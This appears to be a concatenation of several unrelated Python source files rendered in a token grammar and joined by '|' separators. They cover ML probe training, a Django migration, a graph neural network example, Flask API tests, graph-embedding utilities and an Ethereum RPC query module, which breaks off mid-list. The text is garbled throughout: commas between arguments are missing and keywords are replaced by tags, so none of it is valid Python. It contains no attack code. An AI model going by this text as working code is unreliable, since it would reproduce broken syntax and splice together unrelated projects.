label)<line_sep>epoch_loss[k+"_loss"].append(loss.detach().item())<line_sep>preds=preds.cpu().detach().numpy()<line_sep>preds=np.argmax(preds axis=1)<line_sep>label=label.cpu().detach().numpy()<line_sep>accuracy[k+"_acc"].append(calculate_multiclass_accuracy(preds label))<if_stmt>self.probes[k].training<block_start>loss.backward()<line_sep>optim.step()<block_end><block_end><block_end>epoch_loss={k:np.mean(loss)<for>k,loss epoch_loss.items()}<line_sep>accuracy={k:np.mean(acc)<for>k,acc accuracy.items()}<line_sep><return>epoch_loss accuracy<block_end><def_stmt>do_test_epoch self episodes label_dicts<block_start>sample_label=label_dicts[0][0]<line_sep>accuracy_dict,f1_score_dict={} {}<line_sep>pred_dict,all_label_dict={k:[]<for>k sample_label.keys()} {k:[]<for>k sample_label.keys()}<line_sep># collect all predictions first
data_generator=self.generate_batch(episodes label_dicts)<for_stmt>step,(x labels_batch) enumerate(data_generator)<block_start><for_stmt>k,label labels_batch.items()<block_start>label=torch.tensor(label).long().cpu()<line_sep>all_label_dict[k].append(label)<line_sep>preds=self.probe(x k).detach().cpu()<line_sep>pred_dict[k].append(preds)<block_end><block_end><for_stmt>k all_label_dict.keys()<block_start>preds,labels=torch.cat(pred_dict[k]).cpu().detach().numpy() torch.cat(all_label_dict[k]).cpu().detach().numpy()<line_sep>preds=np.argmax(preds axis=1)<line_sep>accuracy=calculate_multiclass_accuracy(preds labels)<line_sep>f1score=calculate_multiclass_f1_score(preds labels)<line_sep>accuracy_dict[k]=accuracy<line_sep>f1_score_dict[k]=f1score<block_end><return>accuracy_dict f1_score_dict<block_end><def_stmt>train self tr_eps val_eps tr_labels val_labels# if not self.encoder:
# assert len(tr_eps[0][0].squeeze().shape) == 2, "if input is a batch of vectors you must specify an encoder!"
<block_start>sample_label=tr_labels[0][0]<line_sep>self.create_probes(sample_label)<line_sep>e=0<line_sep>all_probes_stopped=np.all([early_stopper.early_stop<for>early_stopper self.early_stoppers.values()])<while_stmt>(<not>all_probes_stopped)<and>e<l>self.epochs<block_start>epoch_loss,accuracy=self.do_one_epoch(tr_eps tr_labels)<line_sep>self.log_results(e epoch_loss accuracy)<line_sep>val_loss,val_accuracy=self.evaluate(val_eps val_labels epoch=e)<line_sep># update all early stoppers
<for_stmt>k sample_label.keys()<block_start><if_stmt><not>self.early_stoppers[k].early_stop<block_start>self.early_stoppers[k](val_accuracy["val_"+k+"_acc"] self.probes[k])<block_end><block_end><for_stmt>k,scheduler self.schedulers.items()<block_start><if_stmt><not>self.early_stoppers[k].early_stop<block_start>scheduler.step(val_accuracy['val_'+k+'_acc'])<block_end><block_end>e<augadd>1<line_sep>all_probes_stopped=np.all([early_stopper.early_stop<for>early_stopper self.early_stoppers.values()])<block_end>print("All probes early stopped!")<block_end><def_stmt>evaluate self val_episodes val_label_dicts epoch=<none><block_start><for_stmt>k,probe self.probes.items()<block_start>probe.eval()<block_end>epoch_loss,accuracy=self.do_one_epoch(val_episodes val_label_dicts)<line_sep>epoch_loss={"val_"+k:v<for>k,v epoch_loss.items()}<line_sep>accuracy={"val_"+k:v<for>k,v accuracy.items()}<line_sep>self.log_results(epoch epoch_loss accuracy)<for_stmt>k,probe self.probes.items()<block_start>probe.train()<block_end><return>epoch_loss accuracy<block_end><def_stmt>test self test_episodes test_label_dicts epoch=<none><block_start><for_stmt>k self.early_stoppers.keys()<block_start>self.early_stoppers[k].early_stop=<false><block_end><for_stmt>k,probe self.probes.items()<block_start>probe.eval()<block_end>acc_dict,f1_dict=self.do_test_epoch(test_episodes test_label_dicts)<line_sep>acc_dict,f1_dict=postprocess_raw_metrics(acc_dict f1_dict)<line_sep>print("""In our paper, we report F1 scores and accuracies averaged across each category.
That is, we take a mean across all state variables in a category to get the average score for that category.
Then we average all the category averages to get the final score that we report per game for each method.
These scores are called \'across_categories_avg_acc\' and \'across_categories_avg_f1\' respectively
We do this to prevent categories with large number of state variables dominating the mean F1 score.
""")<line_sep>self.log_results("Test" acc_dict f1_dict)<line_sep><return>acc_dict f1_dict<block_end><def_stmt>log_results self epoch_idx *dictionaries<block_start>print("Epoch: {}".format(epoch_idx))<for_stmt>dictionary dictionaries<block_start><for_stmt>k,v dictionary.items()<block_start>print("\t {}: {:8.4f}".format(k v))<block_end>print("\t --")<block_end><block_end><block_end><def_stmt>postprocess_raw_metrics acc_dict f1_dict<block_start>acc_overall_avg,f1_overall_avg=compute_dict_average(acc_dict) compute_dict_average(f1_dict)<line_sep>acc_category_avgs_dict,f1_category_avgs_dict=compute_category_avgs(acc_dict) compute_category_avgs(f1_dict)<line_sep>acc_avg_across_categories,f1_avg_across_categories=compute_dict_average(acc_category_avgs_dict) compute_dict_average(f1_category_avgs_dict)<line_sep>acc_dict.update(acc_category_avgs_dict)<line_sep>f1_dict.update(f1_category_avgs_dict)<line_sep>acc_dict["overall_avg"],f1_dict["overall_avg"]=acc_overall_avg f1_overall_avg<line_sep>acc_dict["across_categories_avg"],f1_dict["across_categories_avg"]=[acc_avg_across_categories f1_avg_across_categories]<line_sep>acc_dict=append_suffix(acc_dict "_acc")<line_sep>f1_dict=append_suffix(f1_dict "_f1")<line_sep><return>acc_dict f1_dict<block_end><def_stmt>compute_category_avgs metric_dict<block_start>category_dict={}<for_stmt>category_name,category_keys summary_key_dict.items()<block_start>category_values=[v<for>k,v metric_dict.items()<if>k<in>category_keys]<if_stmt>len(category_values)<l>1<block_start><continue><block_end>category_mean=np.mean(category_values)<line_sep>category_dict[category_name+"_avg"]=category_mean<block_end><return>category_dict<block_end> |
# -*- coding: utf-8 -*-
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db models migrations<import_stmt>modelcluster.fields<import_stmt>django.db.models.deletion<import_stmt>modelcluster.contrib.taggit<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('taggit' '0001_initial') ]<line_sep>operations=[migrations.CreateModel(name='Album' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ('release_date' models.DateField(null=<true> blank=<true>)) ('sort_order' models.IntegerField(null=<true> editable=<false> blank=<true>)) ] options={'ordering':['sort_order'] } ) migrations.CreateModel(name='Band' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] options={'abstract':<false> } ) migrations.CreateModel(name='BandMember' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ('band' modelcluster.fields.ParentalKey(related_name='members' to='tests.Band' on_delete=django.db.models.deletion.CASCADE)) ] ) migrations.CreateModel(name='Chef' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] ) migrations.CreateModel(name='Dish' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] ) migrations.CreateModel(name='Log' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('time' models.DateTimeField(null=<true> blank=<true>)) ('data' models.CharField(max_length=255)) ] options={'abstract':<false> } ) migrations.CreateModel(name='MenuItem' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('price' models.DecimalField(max_digits=6 decimal_places=2)) ('dish' models.ForeignKey(related_name='+' to='tests.Dish' on_delete=django.db.models.deletion.CASCADE)) ] ) migrations.CreateModel(name='Place' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] options={'abstract':<false> } ) migrations.CreateModel(name='Review' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('author' models.CharField(max_length=255)) ('body' models.TextField()) ] ) migrations.CreateModel(name='TaggedPlace' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ] options={'abstract':<false> } ) migrations.CreateModel(name='Wine' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] ) migrations.CreateModel(name='Restaurant' fields=[('place_ptr' models.OneToOneField(parent_link=<true> auto_created=<true> primary_key=<true> serialize=<false> to='tests.Place' on_delete=django.db.models.deletion.CASCADE)) ('serves_hot_dogs' models.BooleanField(default=<false>)) ('proprietor' models.ForeignKey(related_name='restaurants' on_delete=django.db.models.deletion.SET_NULL blank=<true> to='tests.Chef' null=<true>)) ] options={'abstract':<false> } bases=('tests.place' ) ) migrations.CreateModel(name='Document' fields=[('id' models.AutoField(verbose_name='ID' primary_key=<true> serialize=<false> auto_created=<true>)) ('title' models.CharField(max_length=255)) ('file' models.FileField(upload_to='documents')) ] options={'abstract':<false> } ) migrations.AddField(model_name='taggedplace' name='content_object' field=modelcluster.fields.ParentalKey(related_name='tagged_items' to='tests.Place' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='taggedplace' name='tag' field=models.ForeignKey(related_name='tests_taggedplace_items' to='taggit.Tag' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='review' name='place' field=modelcluster.fields.ParentalKey(related_name='reviews' to='tests.Place' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='place' name='tags' field=modelcluster.contrib.taggit.ClusterTaggableManager(to='taggit.Tag' through='tests.TaggedPlace' blank=<true> help_text='A comma-separated list of tags.' verbose_name='Tags') ) migrations.AddField(model_name='menuitem' name='recommended_wine' field=models.ForeignKey(related_name='+' on_delete=django.db.models.deletion.SET_NULL blank=<true> to='tests.Wine' null=<true>) ) migrations.AddField(model_name='album' name='band' field=modelcluster.fields.ParentalKey(related_name='albums' to='tests.Band' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='menuitem' name='restaurant' field=modelcluster.fields.ParentalKey(related_name='menu_items' to='tests.Restaurant' on_delete=django.db.models.deletion.CASCADE) ) ]<block_end> |
<import_stmt>torch<import_from_stmt>torch.nn functional<as>F<import_stmt>pytorch_lightning<as>pl<import_from_stmt>pytorch_lightning.callbacks.early_stopping EarlyStopping<import_from_stmt>torch_geometric_temporal.nn.recurrent DCRNN<import_from_stmt>torch_geometric_temporal.dataset ChickenpoxDatasetLoader<import_from_stmt>torch_geometric_temporal.signal temporal_signal_split<class_stmt>LitDiffConvModel(pl.LightningModule)<block_start><def_stmt>__init__ self node_features filters<block_start>super().__init__()<line_sep>self.recurrent=DCRNN(node_features filters 1)<line_sep>self.linear=torch.nn.Linear(filters 1)<block_end><def_stmt>configure_optimizers self<block_start>optimizer=torch.optim.Adam(self.parameters() lr=1e-2)<line_sep><return>optimizer<block_end><def_stmt>training_step self train_batch batch_idx<block_start>x=train_batch.x<line_sep>y=train_batch.y.view(-1 1)<line_sep>edge_index=train_batch.edge_index<line_sep>h=self.recurrent(x edge_index)<line_sep>h=F.relu(h)<line_sep>h=self.linear(h)<line_sep>loss=F.mse_loss(h y)<line_sep><return>loss<block_end><def_stmt>validation_step self val_batch batch_idx<block_start>x=val_batch.x<line_sep>y=val_batch.y.view(-1 1)<line_sep>edge_index=val_batch.edge_index<line_sep>h=self.recurrent(x edge_index)<line_sep>h=F.relu(h)<line_sep>h=self.linear(h)<line_sep>loss=F.mse_loss(h y)<line_sep>metrics={'val_loss':loss}<line_sep>self.log_dict(metrics)<line_sep><return>metrics<block_end><block_end>loader=ChickenpoxDatasetLoader()<line_sep>dataset_loader=loader.get_dataset(lags=32)<line_sep>train_loader,val_loader=temporal_signal_split(dataset_loader train_ratio=0.2)<line_sep>model=LitDiffConvModel(node_features=32 filters=16)<line_sep>early_stop_callback=EarlyStopping(monitor='val_loss' min_delta=0.00 patience=10 verbose=<false> mode='max')<line_sep>trainer=pl.Trainer(callbacks=[early_stop_callback])<line_sep>trainer.fit(model train_loader val_loader)<line_sep> |
# encoding: utf-8
<import_stmt>pytest<line_sep>@pytest.mark.parametrize('auth_scopes' (<none> ('teams:write' ) ))<def_stmt>test_getting_list_of_teams_by_unauthorized_user_must_fail flask_app_client regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/')<block_end><assert_stmt>response.status_code<eq>401<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'status' 'message'}<block_end>@pytest.mark.parametrize('auth_scopes' (('teams:read' ) ('teams:read' 'teams:write' ) ))<def_stmt>test_getting_list_of_teams_by_authorized_user flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/')<block_end><assert_stmt>response.status_code<eq>200<assert_stmt>'X-Total-Count'<in>response.headers<assert_stmt>int(response.headers['X-Total-Count'])<eq>1<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>isinstance(response.json list)<assert_stmt>set(response.json[0].keys())<ge>{'id' 'title'}<if_stmt>response.json[0]['id']<eq>team_for_regular_user.id<block_start><assert_stmt>response.json[0]['title']<eq>team_for_regular_user.title<block_end><block_end>@pytest.mark.parametrize('auth_scopes' (<none> ('teams:write' ) ))<def_stmt>test_getting_team_info_by_unauthorized_user_must_fail flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>401<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'status' 'message'}<block_end>@pytest.mark.parametrize('auth_scopes' (('teams:read' ) ('teams:read' 'teams:write' ) ))<def_stmt>test_getting_team_info_by_authorized_user flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>200<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'id' 'title'}<assert_stmt>response.json['id']<eq>team_for_regular_user.id<assert_stmt>response.json['title']<eq>team_for_regular_user.title<block_end>@pytest.mark.parametrize('auth_scopes' (<none> ('teams:write' ) ))<def_stmt>test_getting_list_of_team_members_by_unauthorized_user_must_fail flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d/members/'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>401<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'status' 'message'}<block_end>@pytest.mark.parametrize('auth_scopes' (('teams:read' ) ('teams:read' 'teams:write' ) ))<def_stmt>test_getting_list_of_team_members_by_authorized_user flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d/members/'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>200<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>isinstance(response.json list)<assert_stmt>set(response.json[0].keys())<ge>{'team' 'user' 'is_leader'}<assert_stmt>set(member['team']['id']<for>member response.json)<eq>{team_for_regular_user.id}<assert_stmt>regular_user.id<in>set(member['user']['id']<for>member response.json)<block_end> |
<import_from_stmt>running_modes.configurations.general_configuration_envelope GeneralConfigurationEnvelope<import_from_stmt>running_modes.validation.logging.base_validation_logger BaseValidationLogger<class_stmt>LocalValidationLogger(BaseValidationLogger)<block_start><def_stmt>__init__ self configuration:GeneralConfigurationEnvelope<block_start>super().__init__(configuration)<block_end><def_stmt>log_message self message:str<block_start>self._common_logger.info(message)<block_end><block_end> |
# -*- coding: utf-8 -*-
<import_stmt>copy<import_stmt>itertools<import_stmt>random<import_stmt>networkx<as>nx<import_stmt>numpy<as>np<import_stmt>bionev.OpenNE.graph<as>og<import_stmt>bionev.struc2vec.graph<as>sg<def_stmt>read_for_OpenNE filename weighted=<false><block_start>G=og.Graph()<line_sep>print("Loading training graph for learning embedding...")<line_sep>G.read_edgelist(filename=filename weighted=weighted)<line_sep>print("Graph Loaded...")<line_sep><return>G<block_end><def_stmt>read_for_struc2vec filename<block_start>print("Loading training graph for learning embedding...")<line_sep>G=sg.load_edgelist(filename undirected=<true>)<line_sep>print("Graph Loaded...")<line_sep><return>G<block_end><def_stmt>read_for_gae filename weighted=<false><block_start>print("Loading training graph for learning embedding...")<line_sep>edgelist=np.loadtxt(filename dtype='float')<if_stmt>weighted<block_start>edgelist=[(int(edgelist[idx 0]) int(edgelist[idx 1]))<for>idx range(edgelist.shape[0])<if>edgelist[idx 2]<g>0]<block_end><else_stmt><block_start>edgelist=[(int(edgelist[idx 0]) int(edgelist[idx 1]))<for>idx range(edgelist.shape[0])]<block_end>G=nx.from_edgelist(edgelist)<line_sep>node_list=list(G.nodes)<line_sep>adj=nx.adjacency_matrix(G nodelist=node_list)<line_sep>print("Graph Loaded...")<line_sep><return>(adj node_list)<block_end><def_stmt>read_for_SVD filename weighted=<false><block_start><if_stmt>weighted<block_start>G=nx.read_weighted_edgelist(filename)<block_end><else_stmt><block_start>G=nx.read_edgelist(filename)<block_end><return>G<block_end><def_stmt>split_train_test_graph input_edgelist seed testing_ratio=0.2 weighted=<false><block_start><if_stmt>(weighted)<block_start>G=nx.read_weighted_edgelist(input_edgelist)<block_end><else_stmt><block_start>G=nx.read_edgelist(input_edgelist)<block_end>node_num1,edge_num1=len(G.nodes) len(G.edges)<line_sep>print('Original Graph: nodes:' node_num1 'edges:' edge_num1)<line_sep>testing_edges_num=int(len(G.edges)<times>testing_ratio)<line_sep>random.seed(seed)<line_sep>testing_pos_edges=random.sample(G.edges testing_edges_num)<line_sep>G_train=copy.deepcopy(G)<for_stmt>edge testing_pos_edges<block_start>node_u,node_v=edge<if_stmt>(G_train.degree(node_u)<g>1<and>G_train.degree(node_v)<g>1)<block_start>G_train.remove_edge(node_u node_v)<block_end><block_end>G_train.remove_nodes_from(nx.isolates(G_train))<line_sep>node_num2,edge_num2=len(G_train.nodes) len(G_train.edges)<assert_stmt>node_num1<eq>node_num2<line_sep>train_graph_filename='graph_train.edgelist'<if_stmt>weighted<block_start>nx.write_edgelist(G_train train_graph_filename data=['weight'])<block_end><else_stmt><block_start>nx.write_edgelist(G_train train_graph_filename data=<false>)<block_end>node_num1,edge_num1=len(G_train.nodes) len(G_train.edges)<line_sep>print('Training Graph: nodes:' node_num1 'edges:' edge_num1)<line_sep><return>G G_train testing_pos_edges train_graph_filename<block_end><def_stmt>generate_neg_edges original_graph testing_edges_num seed<block_start>L=list(original_graph.nodes())<line_sep># create a complete graph
G=nx.Graph()<line_sep>G.add_nodes_from(L)<line_sep>G.add_edges_from(itertools.combinations(L 2))<line_sep># remove original edges
G.remove_edges_from(original_graph.edges())<line_sep>random.seed(seed)<line_sep>neg_edges=random.sample(G.edges testing_edges_num)<line_sep><return>neg_edges<block_end><def_stmt>load_embedding embedding_file_name node_list=<none><block_start><with_stmt>open(embedding_file_name)<as>f<block_start>node_num,emb_size=f.readline().split()<line_sep>print('Nodes with embedding: %s'%node_num)<line_sep>embedding_look_up={}<if_stmt>node_list<block_start><for_stmt>line f<block_start>vec=line.strip().split()<line_sep>node_id=vec[0]<if_stmt>(node_id<in>node_list)<block_start>emb=[float(x)<for>x vec[1:]]<line_sep>emb=emb/np.linalg.norm(emb)<line_sep>emb[np.isnan(emb)]=0<line_sep>embedding_look_up[node_id]=np.array(emb)<block_end><block_end># if len(node_list) != len(embedding_look_up):
# diff_nodes=set(node_list).difference(set(embedding_look_up.keys()))
# for node in diff_nodes:
# emb = np.random.random((int(emb_size)))
# emb = emb / np.linalg.norm(emb)
# emb[np.isnan(emb)] = 0
# embedding_look_up[node] = np.array(emb)
<assert_stmt>len(node_list)<eq>len(embedding_look_up)<block_end><else_stmt><block_start><for_stmt>line f<block_start>vec=line.strip().split()<line_sep>node_id=vec[0]<line_sep>embeddings=vec[1:]<line_sep>emb=[float(x)<for>x embeddings]<line_sep>emb=emb/np.linalg.norm(emb)<line_sep>emb[np.isnan(emb)]=0<line_sep>embedding_look_up[node_id]=list(emb)<block_end><assert_stmt>int(node_num)<eq>len(embedding_look_up)<block_end>f.close()<line_sep><return>embedding_look_up<block_end><block_end><def_stmt>read_node_labels filename<block_start>fin=open(filename 'r')<line_sep>node_list=[]<line_sep>labels=[]<while_stmt>1<block_start>l=fin.readline()<if_stmt>l<eq>''<block_start><break><block_end>vec=l.strip().split()<line_sep>node_list.append(vec[0])<line_sep>labels.append(vec[1:])<block_end>fin.close()<line_sep>print('Nodes with labels: %s'%len(node_list))<line_sep><return>node_list labels<block_end><def_stmt>split_train_test_classify embedding_look_up X Y seed testing_ratio=0.2<block_start>state=np.random.get_state()<line_sep>training_ratio=1-testing_ratio<line_sep>training_size=int(training_ratio<times>len(X))<line_sep>np.random.seed(seed)<line_sep>shuffle_indices=np.random.permutation(np.arange(len(X)))<line_sep>X_train=[embedding_look_up[X[shuffle_indices[i]]]<for>i range(training_size)]<line_sep>Y_train=[Y[shuffle_indices[i]]<for>i range(training_size)]<line_sep>X_test=[embedding_look_up[X[shuffle_indices[i]]]<for>i range(training_size len(X))]<line_sep>Y_test=[Y[shuffle_indices[i]]<for>i range(training_size len(X))]<line_sep>X_train=np.array(X_train)<line_sep>Y_train=np.array(Y_train)<line_sep>X_test=np.array(X_test)<line_sep>Y_test=np.array(Y_test)<line_sep>np.random.set_state(state)<line_sep><return>X_train Y_train X_test Y_test<block_end><def_stmt>get_y_pred y_test y_pred_prob<block_start>y_pred=np.zeros(y_pred_prob.shape)<line_sep>sort_index=np.flip(np.argsort(y_pred_prob axis=1) 1)<for_stmt>i range(y_test.shape[0])<block_start>num=np.sum(y_test[i])<for_stmt>j range(num)<block_start>y_pred[i][sort_index[i][j]]=1<block_end><block_end><return>y_pred<block_end> |
<class_stmt>InternalError(Exception)<block_start><pass><block_end><class_stmt>InvalidAccessError(Exception)<block_start><pass><block_end><class_stmt>InvalidStateError(Exception)<block_start><pass><block_end> |
<import_stmt>json<import_stmt>logging<import_stmt>random<import_from_stmt>typing Any Callable Dict List Literal Optional Sequence Tuple Union overload<import_from_stmt>urllib.parse urlparse<import_stmt>requests<import_from_stmt>ens ENS<import_from_stmt>ens.abis ENS<as>ENS_ABI RESOLVER<as>ENS_RESOLVER_ABI<import_from_stmt>ens.exceptions InvalidName<import_from_stmt>ens.main ENS_MAINNET_ADDR<import_from_stmt>ens.utils address_to_reverse_domain is_none_or_zero_address normal_name_to_hash normalize_name <import_from_stmt>eth_typing BlockNumber HexStr<import_from_stmt>web3 HTTPProvider Web3<import_from_stmt>web3._utils.abi get_abi_output_types<import_from_stmt>web3._utils.contracts find_matching_event_abi<import_from_stmt>web3._utils.filters construct_event_filter_params<import_from_stmt>web3.datastructures MutableAttributeDict<import_from_stmt>web3.exceptions BadFunctionCallOutput BadResponseFormat BlockNotFound TransactionNotFound <import_from_stmt>web3.types BlockIdentifier FilterParams<import_from_stmt>rotkehlchen.chain.constants DEFAULT_EVM_RPC_TIMEOUT<import_from_stmt>rotkehlchen.chain.ethereum.contracts EthereumContract<import_from_stmt>rotkehlchen.chain.ethereum.graph Graph<import_from_stmt>rotkehlchen.chain.ethereum.modules.eth2.constants ETH2_DEPOSIT<import_from_stmt>rotkehlchen.chain.ethereum.types EnsContractParams string_to_ethereum_address<import_from_stmt>rotkehlchen.chain.ethereum.utils multicall multicall_2<import_from_stmt>rotkehlchen.constants.ethereum ERC20TOKEN_ABI ETH_SCAN UNIV1_LP_ABI<import_from_stmt>rotkehlchen.errors.misc BlockchainQueryError InputError RemoteError UnableToDecryptRemoteData <import_from_stmt>rotkehlchen.errors.serialization DeserializationError<import_from_stmt>rotkehlchen.externalapis.etherscan Etherscan<import_from_stmt>rotkehlchen.fval FVal<import_from_stmt>rotkehlchen.greenlets GreenletManager<import_from_stmt>rotkehlchen.logging RotkehlchenLogsAdapter<import_from_stmt>rotkehlchen.serialization.deserialize deserialize_ethereum_address deserialize_ethereum_transaction deserialize_int_from_hex <import_from_stmt>rotkehlchen.serialization.serialize process_result<import_from_stmt>rotkehlchen.types ChecksumEthAddress EthereumTransaction EVMTxHash SupportedBlockchain Timestamp <import_from_stmt>rotkehlchen.user_messages MessagesAggregator<import_from_stmt>rotkehlchen.utils.misc from_wei hex_or_bytes_to_str<import_from_stmt>rotkehlchen.utils.network request_get_dict<import_from_stmt>.types NodeName<import_from_stmt>.utils ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS<line_sep>logger=logging.getLogger(__name__)<line_sep>log=RotkehlchenLogsAdapter(logger)<def_stmt>_is_synchronized current_block:int latest_block:int<arrow>Tuple[bool str]<block_start>""" Validate that the ethereum node is synchronized
within 20 blocks of latest block
Returns a tuple (results, message)
- result: Boolean for confirmation of synchronized
- message: A message containing information on what the status is.
"""<line_sep>message=''<if_stmt>current_block<l>(latest_block-20)<block_start>message=(f'Found ethereum node but it is out of sync. {current_block} / '<concat>f'{latest_block}. Will use etherscan.')<line_sep>log.warning(message)<line_sep><return><false> message<block_end><return><true> message<block_end>WEB3_LOGQUERY_BLOCK_RANGE=250000<def_stmt>_query_web3_get_logs web3:Web3 filter_args:FilterParams from_block:int to_block:Union[int Literal['latest']] contract_address:ChecksumEthAddress event_name:str argument_filters:Dict[str Any] <arrow>List[Dict[str Any]]<block_start>until_block=web3.eth.block_number<if>to_block<eq>'latest'<else>to_block<line_sep>events:List[Dict[str Any]]=[]<line_sep>start_block=from_block<line_sep># we know that in most of its early life the Eth2 contract address returns a
# a lot of results. So limit the query range to not hit the infura limits every time
# supress https://lgtm.com/rules/1507386916281/ since it does not apply here
infura_eth2_log_query=('infura.io'<in>web3.manager.provider.endpoint_uri<and># type: ignore # noqa: E501 lgtm [py/incomplete-url-substring-sanitization]
contract_address<eq>ETH2_DEPOSIT.address)<line_sep>block_range=initial_block_range=WEB3_LOGQUERY_BLOCK_RANGE<if_stmt>infura_eth2_log_query<block_start>block_range=initial_block_range=75000<block_end><while_stmt>start_block<le>until_block<block_start>filter_args['fromBlock']=start_block<line_sep>end_block=min(start_block+block_range until_block)<line_sep>filter_args['toBlock']=end_block<line_sep>log.debug('Querying web3 node for contract event' contract_address=contract_address event_name=event_name argument_filters=argument_filters from_block=filter_args['fromBlock'] to_block=filter_args['toBlock'] )<line_sep># As seen in https://github.com/rotki/rotki/issues/1787, the json RPC, if it
# is infura can throw an error here which we can only parse by catching the exception
<try_stmt><block_start>new_events_web3:List[Dict[str Any]]=[dict(x)<for>x web3.eth.get_logs(filter_args)]# noqa: E501
<block_end><except_stmt>(ValueError KeyError)<as>e<block_start><if_stmt>isinstance(e ValueError)<block_start><try_stmt><block_start>decoded_error=json.loads(str(e).replace("'" '"'))<block_end><except_stmt>json.JSONDecodeError# reraise the value error if the error is not json
<block_start><raise>e<from><none><block_end>msg=decoded_error.get('message' '')<block_end><else_stmt># temporary hack for key error seen from pokt
<block_start>msg='query returned more than 10000 results'<block_end># errors from: https://infura.io/docs/ethereum/json-rpc/eth-getLogs
<if_stmt>msg<in>('query returned more than 10000 results' 'query timeout exceeded')<block_start>block_range=block_range<floordiv>2<if_stmt>block_range<l>50<block_start><raise># stop retrying if block range gets too small
<block_end># repeat the query with smaller block range
<continue><block_end># else, well we tried .. reraise the error
<raise>e<block_end># Turn all HexBytes into hex strings
<for_stmt>e_idx,event enumerate(new_events_web3)<block_start>new_events_web3[e_idx]['blockHash']=event['blockHash'].hex()<line_sep>new_topics=[]<for_stmt>topic event['topics']<block_start>new_topics.append(topic.hex())<block_end>new_events_web3[e_idx]['topics']=new_topics<line_sep>new_events_web3[e_idx]['transactionHash']=event['transactionHash'].hex()<block_end>start_block=end_block+1<line_sep>events.extend(new_events_web3)<line_sep># end of the loop, end of 1 query. Reset the block range to max
block_range=initial_block_range<block_end><return>events<block_end><def_stmt>_prepare_ens_call_arguments addr:ChecksumEthAddress<arrow>List[Any]<block_start><try_stmt><block_start>reversed_domain=address_to_reverse_domain(addr)<block_end><except_stmt>(TypeError ValueError)<as>e<block_start><raise>InputError(f'Address {addr} has incorrect format or type. {str(e)}')<from>e<block_end>normalized_domain_name=normalize_name(reversed_domain)<line_sep>arguments=[normal_name_to_hash(normalized_domain_name)]<line_sep><return>arguments<block_end><def_stmt>_encode_ens_contract params:EnsContractParams<arrow>str<block_start>contract=EthereumContract(address=params.address abi=params.abi deployed_block=0)<line_sep><return>contract.encode(method_name=params.method_name arguments=params.arguments)<block_end><def_stmt>_decode_ens_contract params:EnsContractParams result_encoded:Any<arrow>ChecksumEthAddress<block_start>contract=EthereumContract(address=params.address abi=params.abi deployed_block=0)<line_sep>result=contract.decode(# pylint: disable=E1136
result=result_encoded method_name=params.method_name arguments=params.arguments )[0]<line_sep><return>string_to_ethereum_address(result)<block_end># TODO: Ideally all these should become configurable
# Taking LINKPOOL out since it's just really too slow and seems to not
# respond to the batched calls almost at all. Combined with web3.py retries
# this makes the tokens balance queries super slow.
OPEN_NODES=(NodeName.MYCRYPTO NodeName.BLOCKSCOUT NodeName.AVADO_POOL NodeName.ONEINCH NodeName.MYETHERWALLET # NodeName.LINKPOOL,
